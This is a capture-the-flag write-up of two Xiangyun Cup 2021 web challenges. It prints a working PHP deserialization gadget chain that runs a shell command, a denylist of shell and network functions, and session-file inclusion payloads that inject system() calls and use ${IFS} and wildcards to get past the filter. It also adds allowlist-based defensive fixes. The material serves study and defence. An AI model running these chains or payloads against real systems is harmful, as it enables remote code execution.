2021 Xiangyun Cup (祥云杯) Web

Some of the Web challenges; I'm too weak and couldn't solve a few of them.

ezyii

Reference: https://xz.aliyun.com/t/9948
However, the fourth chain was later removed by the author.

The code is as follows:

<?php
namespace Codeception\Extension{
    use Faker\DefaultGenerator;
    use GuzzleHttp\Psr7\AppendStream;
    // Entry point of the chain: the serialized RunProcess carries the rest of the objects.
    class RunProcess{
        protected $output;
        private $processes = [];
        public function __construct(){
            $this->processes[]=new DefaultGenerator(new AppendStream());
            $this->output=new DefaultGenerator('jiang');
        }
    }
    echo base64_encode(serialize(new RunProcess()));
}

namespace Faker{
    // Stand-in for Faker's DefaultGenerator: its __call returns $default, whatever the method.
    class DefaultGenerator
    {
        protected $default;

        public function __construct($default = null)
        {
            $this->default = $default;
        }
    }
}

namespace GuzzleHttp\Psr7{
    use Faker\DefaultGenerator;
    final class AppendStream{
        private $streams = [];
        private $seekable = true;
        public function __construct(){
            $this->streams[]=new CachingStream();
        }
    }
    final class CachingStream{
        private $remoteStream;
        public function __construct(){
            $this->remoteStream=new DefaultGenerator(false);
            // $stream is set as a dynamic property on purpose (serialized as public).
            $this->stream=new PumpStream();
        }
    }
    final class PumpStream{
        private $source;
        private $size=-10;
        private $buffer;
        public function __construct(){
            $this->buffer=new DefaultGenerator('j');
            // Opis\Closure makes the closure serializable; it ends up in $source.
            include("closure/autoload.php");
            $a = function(){system('cat /flag.txt');};
            $a = \Opis\Closure\serialize($a);
            $b = unserialize($a);
            $this->source=$b;
        }
    }
}
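As an added defensive example (not code from the writeup, from the xz.aliyun article, or from the Yii, Codeception, Faker or Guzzle projects): a deserialization wrapper that refuses any blob naming a class outside an allowlist, so a chain like the one above is never instantiated and none of its magic methods ever run. The function names and the sample blobs are constructed for this demo; the third blob reuses only the RunProcess class name from the chain, with no properties.

```php
<?php
// Added defensive example: not code from the writeup, nor from Yii, Codeception,
// Faker or Guzzle. Blobs naming a class outside the allowlist are rejected before
// unserialize() ever builds an object, so no __destruct/__wakeup/__toString runs.

declare(strict_types=1);

/** Class names referenced by O: (object) and C: (custom-serialized) tokens in a blob. */
function serializedClassNames(string $blob): array
{
    // Deliberately fails closed: a class-shaped token inside a string value also counts.
    preg_match_all('/[OC]:\d+:"([^"]+)"/', $blob, $m);
    return array_values(array_unique($m[1]));
}

/** Unserialize with a strict allowlist; throws instead of creating __PHP_Incomplete_Class objects. */
function safeUnserialize(string $blob, array $allowedClasses)
{
    $unknown = array_diff(serializedClassNames($blob), $allowedClasses);
    if ($unknown !== []) {
        throw new UnexpectedValueException('Refusing to unserialize: ' . implode(', ', $unknown));
    }
    // Second line of defence: PHP >= 7.0 enforces the same list natively.
    return unserialize($blob, ['allowed_classes' => $allowedClasses]);
}

// Constructed inputs for the demo.
$plainData  = serialize(['user' => 'alice', 'roles' => ['reader']]);
$dateObject = serialize(new DateTime('2021-08-21 00:00:00', new DateTimeZone('UTC')));
// Only the RunProcess class name from the chain above, with no properties: not a working chain.
$chainToken = 'O:32:"Codeception\Extension\RunProcess":0:{}';

var_dump(safeUnserialize($plainData, []));              // data only, no classes needed
var_dump(safeUnserialize($dateObject, ['DateTime']));   // an explicitly allowed class
try {
    safeUnserialize($chainToken, ['DateTime']);          // rejected before any object exists
} catch (UnexpectedValueException $e) {
    echo $e->getMessage(), "\n";
}
```

The pre-scan is what gives a clean log line and a hard failure; `allowed_classes` alone would silently hand back `__PHP_Incomplete_Class` objects, which is safe against the chain but easy to miss in monitoring. Where the application needs no objects at all, JSON is the better interchange format and `unserialize` should not be reachable from request data.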

Security Check (安全检测)

A POST request triggered an error message that revealed the code uses file_get_contents.

The first thing that came to mind was reading files through PHP stream wrappers (pseudo-protocols). I tried quite a few; they were either disabled or simply did not work.

POST /check2.php HTTP/1.1
Host: eci-2zefzyj8kapkgt0oad3m.cloudeci1.ichunqiu.com

url1=http://ss123.828.22.1/

Next I ran a directory scan and found an admin folder; tried accessing it, payload: http://127.0.0.1/admin/

[screenshot: admin folder]

Then moved on to include123.php: http://127.0.0.1/admin/include123.php

[screenshot: include123.php]

<?php
$u=$_GET['u'];

// Denylist of substrings; each entry is later used as an unanchored, case-insensitive regex.
$pattern = "\/\*|\*|\.\.\/|\.\/|load_file|outfile|dumpfile|sub|hex|where";
$pattern .= "|file_put_content|file_get_content|fwrite|curl|system|eval|assert";
$pattern .="|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore";
$pattern .="|`|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec|http|.php|.ph|.log|\@|:\/\/|flag|access|error|stdout|stderr";
$pattern .="|file|dict|gopher";
// tired, tired, tea break first

$vpattern = explode("|",$pattern);

foreach($vpattern as $value){
    if (preg_match( "/$value/i", $u )){
        echo "检测到恶意字符";
        exit(0);
    }
}

// Anything that survives the denylist is included as-is.
include($u);

show_source(__FILE__);
?>

I tested a lot of things and none worked; then I read up on the session file inclusion vulnerability, and that should be it.

Common php session storage locations:
/var/lib/php/sess_PHPSESSID
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID

[screenshot: PHPSESSID]

Ran phpinfo; it worked.

payload: http://127.0.0.1/admin/include123.php?u=/tmp/sess_bedc37fbe5d2e7b064d01cce92e65182&test=<?=phpinfo();?>
<?="xx"?> is the PHP short echo tag, equivalent to <?php echo "xx"; ?>

[screenshot: phpinfo()]

Now try running ls; here ${IFS} is used in place of the space character.

payload: http://127.0.0.1/admin/include123.php?u=/tmp/sess_bedc37fbe5d2e7b064d01cce92e65182&test=<?=system('ls${IFS}/');?>

[screenshot: ls${IFS}/]

bin boot dev etc getflag.sh home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var var

getflag.sh exists in the root directory, so try running it. Since flag is filtered, fl?g is used in place of flag.

payload: http://127.0.0.1/admin/include123.php?u=/tmp/sess_bedc37fbe5d2e7b064d01cce92e65182&test=<?=system('.${IFS}/getfl?g.sh');?>

[screenshot: getflag.sh]
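The include123.php filter above is a denylist, and the session-file steps show how it is walked around: a path that matches none of the patterns still reaches include(), and the test parameter being persisted into the session file supplies the content. As an added example (not the challenge's or the writeup's code), this is the allowlist version I would put in its place: the request parameter selects a key, not a path, and the resolved file must still sit under a fixed base directory. PAGES, resolvePage and the throwaway directory are constructed for the demo.

```php
<?php
// Added example (not from the original writeup): replace the denylist in
// include123.php with an allowlist plus a base-directory confinement check.
// PAGES and the temporary directory layout below are constructed for the demo.

declare(strict_types=1);

const PAGES = [
    'home'  => 'home.php',
    'about' => 'about.php',
];

/** Map a request parameter to an includable file, or null if it must be refused. */
function resolvePage(string $name, string $baseDir): ?string
{
    // 1. Only names present in the allowlist are accepted at all; the value is a key, never a path.
    if (!array_key_exists($name, PAGES)) {
        return null;
    }
    // 2. Canonicalise and confirm the target still lives inside $baseDir (guards against
    //    a mis-edited PAGES entry or a symlink planted in the pages directory).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$name]);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Demo harness: build a throwaway pages directory so the script runs anywhere.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/home.php',  "<?php echo 'home';\n");
file_put_contents($dir . '/about.php', "<?php echo 'about';\n");

// Constructed inputs: two legitimate keys, then the kinds of values the denylist was meant to stop.
$inputs = [
    'home',
    'about',
    '/tmp/sess_bedc37fbe5d2e7b064d01cce92e65182',            // session-file inclusion from the writeup
    '../../../../etc/passwd',                                // traversal
    'php://filter/convert.base64-encode/resource=index.php', // stream wrapper
];
foreach ($inputs as $u) {
    $resolved = resolvePage($u, $dir);
    printf("%-60s => %s\n", $u, $resolved === null ? 'rejected' : 'include ' . basename($resolved));
}

// Clean up the demo directory.
unlink($dir . '/home.php');
unlink($dir . '/about.php');
rmdir($dir);
```

With this shape there is nothing for a pattern filter to do: the only strings that reach include() are the two constants in PAGES. The other half of the fix is on the session side: raw request input such as the test parameter should never be written into $_SESSION unvalidated, since the session file then becomes attacker-controlled content on a predictable path.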

References

A single article to understand PHP file inclusion vulnerabilities (一篇文章带你理解漏洞之 PHP 文件包含漏洞)
File inclusion vulnerabilities (文件包含漏洞)
Complete collection of the latest yii 2.0.42 deserialization exploits (yii 2.0.42 最新反序列化利用全集)
[Xiangyun Cup 2021] writeup ([祥云杯2021] wp)